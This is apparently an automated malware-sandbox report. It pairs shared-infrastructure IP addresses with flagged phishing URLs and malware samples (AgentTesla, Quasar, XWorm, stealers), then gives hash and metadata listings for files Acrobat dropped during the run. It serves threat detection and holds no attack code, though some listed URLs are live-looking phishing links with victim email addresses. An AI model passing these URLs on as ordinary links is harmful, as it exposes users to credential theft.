                                                    Invoice - 13604562148823146027218688082530555300774892366170 - Pilatus-aircraft.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 23.47.168.24
                                                    https://we.tl/t-dQx6fJKslTGet hashmaliciousUnknownBrowse
                                                    • 23.211.10.211
                                                    CLOUDFLARENETUShttps://chorbie.com/services/Get hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                                                    • 104.17.28.25
                                                    Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.21.40.60
                                                    0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    Leaked.exeGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                                    • 104.26.13.205
                                                    Luciana Alvarez CV.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    Acal BFi UK - Products List 020240704.exeGet hashmaliciousAgentTesla, RedLine, StormKitty, XWormBrowse
                                                    • 172.67.74.152
                                                    z4XlS0wTQM.exeGet hashmaliciousQuasarBrowse
                                                    • 104.26.12.205
                                                    FASTLYUShttps://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.66.137
                                                    https://iriss.online/i/ontransfer_pathways/login?p=loginGet hashmaliciousUnknownBrowse
                                                    • 104.244.43.131
                                                    https://vi-822.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    http://sharepoint-stonecuttercapital.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.2.137
                                                    https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.130.137
                                                    https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflkGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.130.137
                                                    http://kuurza.comGet hashmaliciousUnknownBrowse
                                                    • 151.101.194.137
                                                    https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.110.133
                                                    http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.133
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    https://chorbie.com/services/Get hashmaliciousUnknownBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    http://79.141.36.131Get hashmaliciousUnknownBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    hANEXOPDF.PDF40 234057.msiGet hashmaliciousUnknownBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    http://circulaires.infoGet hashmaliciousUnknownBrowse
                                                    • 184.28.90.27
                                                    • 40.68.123.157
                                                    • 20.114.59.183
                                                    No context
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.224510822903688
                                                    Encrypted:false
                                                    SSDEEP:6:BOEccM+q2Pwkn2nKuAl9OmbnIFUt84OKcJZmw+4OKccMVkwOwkn2nKuAl9OmbjLJ:EERM+vYfHAahFUt811/+1QMV5JfHAaSJ
                                                    MD5:AB1E5996370E1A8E7F1ED82F80118AE2
                                                    SHA1:4EE2D7B21D95F322619AF3AEC69E235897ABFDED
                                                    SHA-256:9CE0C72AE2F760EC6E88515B82B62509A15E9C93E40E43AE160378CB7359F4E9
                                                    SHA-512:4CA7F146AC3F51E9E1BF551290452EBF1591B38EDACC494EB53A938617CDBE39493B4DABCEF64A33B0EDEB0DD4066DDC57D52BC1DA5F5BC3C9C882EDDDD705C5
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/07/04-15:05:31.197 19fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/04-15:05:31.199 19fc Recovering log #3.2024/07/04-15:05:31.199 19fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.224510822903688
                                                    Encrypted:false
                                                    SSDEEP:6:BOEccM+q2Pwkn2nKuAl9OmbnIFUt84OKcJZmw+4OKccMVkwOwkn2nKuAl9OmbjLJ:EERM+vYfHAahFUt811/+1QMV5JfHAaSJ
                                                    MD5:AB1E5996370E1A8E7F1ED82F80118AE2
                                                    SHA1:4EE2D7B21D95F322619AF3AEC69E235897ABFDED
                                                    SHA-256:9CE0C72AE2F760EC6E88515B82B62509A15E9C93E40E43AE160378CB7359F4E9
                                                    SHA-512:4CA7F146AC3F51E9E1BF551290452EBF1591B38EDACC494EB53A938617CDBE39493B4DABCEF64A33B0EDEB0DD4066DDC57D52BC1DA5F5BC3C9C882EDDDD705C5
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/07/04-15:05:31.197 19fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/04-15:05:31.199 19fc Recovering log #3.2024/07/04-15:05:31.199 19fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):336
                                                    Entropy (8bit):5.201881339095042
                                                    Encrypted:false
                                                    SSDEEP:6:BOPxQ+q2Pwkn2nKuAl9Ombzo2jMGIFUt84OKgZmw+4OB+SQVkwOwkn2nKuAl9OmT:ES+vYfHAa8uFUt81v/+1B+3V5JfHAa8z
                                                    MD5:EB8400B3AFDCD865E27E5A11A30B7DAF
                                                    SHA1:496D35FC140E05479B85038C810E5FCA4F51D180
                                                    SHA-256:E73A5A933067E3C5DE3A6930325E0337D62D0625C2A818E197657D2BBCF4E2FC
                                                    SHA-512:FE0FB3AB08E3BC678DDF4D5759AED19E855F53D0E858F89F1C557B7973BAFF56C316E6E69C97854D9C01C866151739D9A536550E680234E3F958266AFBA067D5
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/07/04-15:05:31.297 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/04-15:05:31.298 1cdc Recovering log #3.2024/07/04-15:05:31.299 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):336
                                                    Entropy (8bit):5.201881339095042
                                                    Encrypted:false
                                                    SSDEEP:6:BOPxQ+q2Pwkn2nKuAl9Ombzo2jMGIFUt84OKgZmw+4OB+SQVkwOwkn2nKuAl9OmT:ES+vYfHAa8uFUt81v/+1B+3V5JfHAa8z
                                                    MD5:EB8400B3AFDCD865E27E5A11A30B7DAF
                                                    SHA1:496D35FC140E05479B85038C810E5FCA4F51D180
                                                    SHA-256:E73A5A933067E3C5DE3A6930325E0337D62D0625C2A818E197657D2BBCF4E2FC
                                                    SHA-512:FE0FB3AB08E3BC678DDF4D5759AED19E855F53D0E858F89F1C557B7973BAFF56C316E6E69C97854D9C01C866151739D9A536550E680234E3F958266AFBA067D5
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/07/04-15:05:31.297 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/04-15:05:31.298 1cdc Recovering log #3.2024/07/04-15:05:31.299 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:modified
                                                    Size (bytes):475
                                                    Entropy (8bit):4.963975653953267
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqGgXhsBdOg2H2caq3QYiubInP7E4T3y:Y2sRdssXydMHJ3QYhbG7nby
                                                    MD5:4024321CA7B531C9AB4FE84F60150D51
                                                    SHA1:CE34663D89C380F228C0EE64F145554BB61B4303
                                                    SHA-256:768AFB91A801F8C4CD1EBA38295829EF7D2E2EBE449D6051D6D0788003AD5E95
                                                    SHA-512:419F9AAE95C6029196B38C942721018CAD32DD75EA4080A6A665751F9131D42FD72371F36DD3731E953484A9CB4A038DE559F3D3D81C668B6F92CF3C76561A70
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364679943839736","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149608},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):475
                                                    Entropy (8bit):4.963975653953267
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqGgXhsBdOg2H2caq3QYiubInP7E4T3y:Y2sRdssXydMHJ3QYhbG7nby
                                                    MD5:4024321CA7B531C9AB4FE84F60150D51
                                                    SHA1:CE34663D89C380F228C0EE64F145554BB61B4303
                                                    SHA-256:768AFB91A801F8C4CD1EBA38295829EF7D2E2EBE449D6051D6D0788003AD5E95
                                                    SHA-512:419F9AAE95C6029196B38C942721018CAD32DD75EA4080A6A665751F9131D42FD72371F36DD3731E953484A9CB4A038DE559F3D3D81C668B6F92CF3C76561A70
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364679943839736","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149608},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4730
                                                    Entropy (8bit):5.252784210740961
                                                    Encrypted:false
                                                    SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7eaUyljwZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goA
                                                    MD5:418456130655FC86FE805A36A2B122B3
                                                    SHA1:0EF9016747E5BD9EE5EFA5B020D43CEB5607BEC8
                                                    SHA-256:059F5820345930CB5D26CC4F514CC1EC8376D8CE879D135F443C1596577B6892
                                                    SHA-512:8F44E7861BE123376FEA607D9A9C757AA6E1844224685ABCE78938AF701312A10A6FB421AB9A58CFF43B8848C42A47BDD435B98DF4B66A7052039689BF79E351
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):324
                                                    Entropy (8bit):5.165093121546565
                                                    Encrypted:false
                                                    SSDEEP:6:BOZoSQ+q2Pwkn2nKuAl9OmbzNMxIFUt84OMBpgZmw+4OMBpQVkwOwkn2nKuAl9Ob:EZo3+vYfHAa8jFUt81D/+1zV5JfHAa8E
                                                    MD5:114575B4E584F33CBB7D0723A9FBE998
                                                    SHA1:AAE4878808EAFB07EFD0405706671AEB0C9CB6EF
                                                    SHA-256:90EEF9547F21895C87609B1AF461D39405DE5B8776331FDDAF585FE471356E98
                                                    SHA-512:95EDC62246BF2B186936D1051D9AA32F8976A6E20FB1FBD29F85890F3664AA2289D87BBFF8861B77DE1D464D99F98277ABAEEA7BD3751F8AD864B8E6F6640808
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/07/04-15:05:31.543 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/04-15:05:31.544 1cdc Recovering log #3.2024/07/04-15:05:31.544 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):324
                                                    Entropy (8bit):5.165093121546565
                                                    Encrypted:false
                                                    SSDEEP:6:BOZoSQ+q2Pwkn2nKuAl9OmbzNMxIFUt84OMBpgZmw+4OMBpQVkwOwkn2nKuAl9Ob:EZo3+vYfHAa8jFUt81D/+1zV5JfHAa8E
                                                    MD5:114575B4E584F33CBB7D0723A9FBE998
                                                    SHA1:AAE4878808EAFB07EFD0405706671AEB0C9CB6EF
                                                    SHA-256:90EEF9547F21895C87609B1AF461D39405DE5B8776331FDDAF585FE471356E98
                                                    SHA-512:95EDC62246BF2B186936D1051D9AA32F8976A6E20FB1FBD29F85890F3664AA2289D87BBFF8861B77DE1D464D99F98277ABAEEA7BD3751F8AD864B8E6F6640808
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/07/04-15:05:31.543 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/04-15:05:31.544 1cdc Recovering log #3.2024/07/04-15:05:31.544 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):71190
                                                    Entropy (8bit):1.4896375494629646
                                                    Encrypted:false
                                                    SSDEEP:768:piGiGiGiGiGDG6GhGSGiGiGPG+OG2OGqOGXOGPGiGiGiGiGib+7GL9GM6GyGiGiI:D
                                                    MD5:16BA2B354C852DFCFD28058E49C9A2E9
                                                    SHA1:DA7FA43BFB36E52115C1B3463FD214074774D40F
                                                    SHA-256:3DCCF0AC19B9A0AA7193AAA5A4A484542239F45631606AE96B044CF3E21D80FD
                                                    SHA-512:F1BBD6B4103890362A9471932BB74FB709CD6418929FAA181CF69468102B71DD5544C6CCD2636CDD924A55F49EBA8B928C9E10A23CB1E62B1DE56CED00F6635D
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):4.44512701049133
                                                    Encrypted:false
                                                    SSDEEP:384:yezci5tmiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rps3OazzU89UTTgUL
                                                    MD5:9C8D4C87CEF3E18CD84B4844C786DA9C
                                                    SHA1:175797CDDD3812161EC5F712F2A74482FA2A4F11
                                                    SHA-256:548D6EAEEBDEE99F15D6862B30EDB9ACC542A9ABE4A80008C95490D493405D3A
                                                    SHA-512:8BE669EF6BA7F87D72AE9FA8A13F696586750FB988B78D31FEE11D150151DAE2422441A35C78F9561115E513443DFB8B369FAE0AF86AF026CADAFC3B745D8344
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.774217017650316
                                                    Encrypted:false
                                                    SSDEEP:48:7M5p/E2ioyVhioy9oWoy1Cwoy1NKOioy1noy1AYoy1Wioy1hioybioyJoy1noy1v:7apjuhFAXKQ4Pb9IVXEBodRBkz
                                                    MD5:3E4EC2B7DF632926FEEDEA5FAF03CCA1
                                                    SHA1:90601A811872F01D04AEDBC57748105B07D51D4E
                                                    SHA-256:2127EA0C87F4CFE0EC2FC7738224A0D9EF1AFACA80923BFDF9F9032FCADE69D7
                                                    SHA-512:8E416A6BE9BC5B4300DA23A49E14F427DEDFC6E4F0FE38F9A6BAD80B9F07C912C851F2D944410DFE36A157A4A417E5B65C7B4C1257F96D90B138273A2D0F5259
                                                    Malicious:false
                                                    Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                    Category:dropped
                                                    Size (bytes):71954
                                                    Entropy (8bit):7.996617769952133
                                                    Encrypted:true
                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                    Malicious:false
                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):893
                                                    Entropy (8bit):7.366016576663508
                                                    Encrypted:false
                                                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                    Malicious:false
                                                    Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):328
                                                    Entropy (8bit):3.1379890379152853
                                                    Encrypted:false
                                                    SSDEEP:6:kKZk3D9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:yqDnLNkPlE99SNxAhUe/3
                                                    MD5:31F9F3731AF7D268B4B7049808CE2041
                                                    SHA1:BF5DEA5090CD19477267E858051D6535776099D5
                                                    SHA-256:3195A63DAFCBE439521D315CEADDA184FE76FE0BCA17412222E19A2D5C400C9E
                                                    SHA-512:D622DBFEB85859D955F084A886695BDC957A919FAB7870E023F8006DC742C0DA01B146576ABB95E5A90B5DB3241D5BFD885AD6C91B70B0FF7E2DCCDF1940FC8A
                                                    Malicious:false
                                                    Preview:p...... ........R..OE...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):252
                                                    Entropy (8bit):3.034404395079139
                                                    Encrypted:false
                                                    SSDEEP:3:kkFkltV/M1fllXlE/E/KRkzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB8V7ln3:kK31xliBAIdQZV7I7kc3
                                                    MD5:27DD94850D516D9C17C3159F7AA709E6
                                                    SHA1:061CC23E33D94B0FDE692436B988B9FB78A1F465
                                                    SHA-256:C1F943D7D37B6ED2AC31D2D07E0C64E32F636E92BCB97A482E346B121F28B1B4
                                                    SHA-512:2B0A86DAEF5FCCDAEE4779590B3E12991D66D1954D5E14FFDE3CC2297DC4A0D0B6065A94620735115CA59A489F58139AC4106BCD9D2910F86B7D7CFF3F2C9BA5
                                                    Malicious:false
                                                    Preview:p...... ....`......+E...(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PostScript document text
                                                    Category:dropped
                                                    Size (bytes):185099
                                                    Entropy (8bit):5.182478651346149
                                                    Encrypted:false
                                                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
